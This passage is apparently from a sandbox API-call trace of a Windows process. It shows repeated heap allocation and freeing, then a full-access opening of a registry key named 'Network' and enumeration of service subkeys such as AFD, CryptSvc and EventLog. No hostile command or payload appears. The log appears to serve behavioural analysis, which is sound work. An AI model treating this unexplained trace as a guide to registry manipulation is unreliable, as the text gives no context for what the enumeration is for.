dwFlags=0x0, lpMem=0x525b08) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525b08) returned 0x14 [0085.583] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525b08 | out: hHeap=0x510000) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526480) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526480) returned 0x4e [0085.583] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526480 | out: hHeap=0x510000) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525b28) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525b28) returned 0x14 [0085.583] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525b28 | out: hHeap=0x510000) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5264d8) returned 1 [0085.583] GetProcessHeap () returned 0x510000 [0085.583] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5264d8) returned 0x4e [0085.583] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5264d8 | out: hHeap=0x510000) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526548) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526548) returned 0x14 [0085.584] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526548 | out: hHeap=0x510000) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526d30) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526d30) returned 0x4e [0085.584] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526d30 | out: hHeap=0x510000) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526568) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526568) returned 0x14 [0085.584] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526568 | out: hHeap=0x510000) returned 1 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] GetProcessHeap () returned 0x510000 [0085.584] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526d88) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526d88) returned 0x4e [0085.585] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526d88 | out: hHeap=0x510000) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526588) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526588) returned 0x14 [0085.585] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526588 | out: hHeap=0x510000) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526de0) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526de0) returned 0x4e [0085.585] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526de0 | out: hHeap=0x510000) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265a8) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.585] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265a8) returned 0x14 [0085.585] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265a8 | out: hHeap=0x510000) returned 1 [0085.585] GetProcessHeap () returned 0x510000 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526e38) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526e38) returned 0x4e [0085.586] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526e38 | out: hHeap=0x510000) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265c8) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265c8) returned 0x14 [0085.586] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265c8 | out: hHeap=0x510000) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526e90) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526e90) returned 0x4e [0085.586] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526e90 | out: hHeap=0x510000) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5265e8) returned 1 [0085.586] GetProcessHeap () returned 0x510000 [0085.586] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5265e8) returned 0x14 [0085.586] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5265e8 | out: hHeap=0x510000) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ee8) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526ee8) returned 0x4e [0085.587] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526ee8 | out: hHeap=0x510000) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526608) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526608) returned 0x14 [0085.587] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526608 | out: hHeap=0x510000) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526f40) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526f40) returned 0x4e [0085.587] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526f40 | out: hHeap=0x510000) returned 1 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] GetProcessHeap () returned 0x510000 [0085.587] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526628) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526628) returned 0x14 [0085.588] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526628 | out: hHeap=0x510000) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526f98) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526f98) returned 0x4e [0085.588] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526f98 | out: hHeap=0x510000) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526648) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526648) returned 0x14 [0085.588] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526648 | out: hHeap=0x510000) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ff0) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526ff0) returned 0x4e [0085.588] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526ff0 | out: hHeap=0x510000) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526668) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.588] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526668) returned 0x14 [0085.588] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526668 | out: hHeap=0x510000) returned 1 [0085.588] GetProcessHeap () returned 0x510000 [0085.589] GetProcessHeap () returned 0x510000 [0085.589] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527048) returned 1 [0085.589] GetProcessHeap () returned 0x510000 [0085.589] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x527048) returned 0x4e [0085.589] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x527048 | out: hHeap=0x510000) returned 1 [0085.589] GetProcessHeap () returned 0x510000 [0085.589] GetProcessHeap () returned 0x510000 [0085.589] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526688) returned 1 [0085.591] GetProcessHeap () returned 0x510000 [0085.591] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526688) returned 0x14 [0085.591] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526688 | out: hHeap=0x510000) returned 1 [0085.591] GetProcessHeap () returned 0x510000 [0085.591] GetProcessHeap () returned 0x510000 [0085.591] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5270b8) returned 1 [0085.591] GetProcessHeap () returned 0x510000 [0085.592] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5270b8) returned 0x4e [0085.592] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5270b8 | out: hHeap=0x510000) returned 1 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5266a8) returned 1 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5266a8) returned 0x14 [0085.592] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5266a8 | out: hHeap=0x510000) returned 1 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525de0) returned 1 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525de0) returned 0x10 [0085.592] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525de0 | out: hHeap=0x510000) returned 1 [0085.592] RegCloseKey (hKey=0x78) returned 0x0 [0085.592] RegOpenKeyExW (in: hKey=0x74, lpSubKey="Network", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f9b4 | out: phkResult=0x30f9b4*=0x78) returned 0x0 [0085.592] RegQueryInfoKeyW (in: hKey=0x78, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f99c, lpcbMaxSubKeyLen=0x30f9b0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f99c*=0x71, lpcbMaxSubKeyLen=0x30f9b0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.592] GetProcessHeap () returned 0x510000 [0085.592] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525de0 [0085.592] GetProcessHeap () returned 0x510000 [0085.593] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x9e) returned 0x5261c8 [0085.593] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x0, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AFD", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.593] lstrlenW (lpString="AFD") returned 3 [0085.593] GetProcessHeap () returned 0x510000 [0085.593] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x523ab8 [0085.593] GetProcessHeap () returned 0x510000 [0085.593] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525b28 [0085.593] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppInfo", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.593] lstrlenW (lpString="AppInfo") returned 7 [0085.593] GetProcessHeap () returned 0x510000 [0085.593] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525df8 [0085.593] GetProcessHeap () returned 0x510000 [0085.593] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525b08 [0085.593] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppMgmt", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.593] lstrlenW (lpString="AppMgmt") returned 7 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525e10 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525ae8 [0085.594] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Base", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.594] lstrlenW (lpString="Base") returned 4 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525e28 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525ac8 [0085.594] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="BFE", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.594] lstrlenW (lpString="BFE") returned 3 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x525238 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525aa8 [0085.594] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot Bus Extender", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.594] lstrlenW (lpString="Boot Bus Extender") returned 17 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x5250a8 [0085.594] GetProcessHeap () returned 0x510000 [0085.594] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a88 [0085.594] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Boot file system", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.595] lstrlenW (lpString="Boot file system") returned 16 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x22) returned 0x5250d8 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a68 [0085.595] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x7, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bowser", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.595] lstrlenW (lpString="bowser") returned 6 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525e40 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a48 [0085.595] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x8, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Browser", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.595] lstrlenW (lpString="Browser") returned 7 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525e58 [0085.595] GetProcessHeap () returned 0x510000 [0085.595] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a28 [0085.595] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x9, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CryptSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.596] lstrlenW (lpString="CryptSvc") returned 8 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525a08 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5259e8 [0085.596] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xa, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DcomLaunch", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.596] lstrlenW (lpString="DcomLaunch") returned 10 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x5259c8 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5259a8 [0085.596] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xb, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="dfsc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.596] lstrlenW (lpString="dfsc") returned 4 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525e70 [0085.596] GetProcessHeap () returned 0x510000 [0085.596] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525988 [0085.597] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xc, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Dhcp", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.597] lstrlenW (lpString="Dhcp") returned 4 [0085.597] GetProcessHeap () returned 0x510000 [0085.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525e88 [0085.597] GetProcessHeap () returned 0x510000 [0085.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525968 [0085.597] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xd, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DnsCache", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.597] lstrlenW (lpString="DnsCache") returned 8 [0085.597] GetProcessHeap () returned 0x510000 [0085.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525948 [0085.597] GetProcessHeap () returned 0x510000 [0085.597] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525928 [0085.597] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xe, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Dot3Svc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.598] lstrlenW (lpString="Dot3Svc") returned 7 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525ea0 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525908 [0085.598] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xf, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Eaphost", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.598] lstrlenW (lpString="Eaphost") returned 7 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525eb8 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5258e8 [0085.598] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x10, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EFS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.598] lstrlenW (lpString="EFS") returned 3 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x525248 [0085.598] GetProcessHeap () returned 0x510000 [0085.598] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5258c8 [0085.598] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x11, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventLog", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.598] lstrlenW (lpString="EventLog") returned 8 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x5258a8 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525888 [0085.599] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x12, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File system", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.599] lstrlenW (lpString="File system") returned 11 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x525868 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525848 [0085.599] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x13, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Filter", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.599] lstrlenW (lpString="Filter") returned 6 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525ed0 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525828 [0085.599] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x14, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HelpSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.599] lstrlenW (lpString="HelpSvc") returned 7 [0085.599] GetProcessHeap () returned 0x510000 [0085.599] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525ee8 [0085.599] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525808 [0085.600] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x15, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IKEEXT", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.600] lstrlenW (lpString="IKEEXT") returned 6 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f00 [0085.600] GetProcessHeap () returned 0x510000 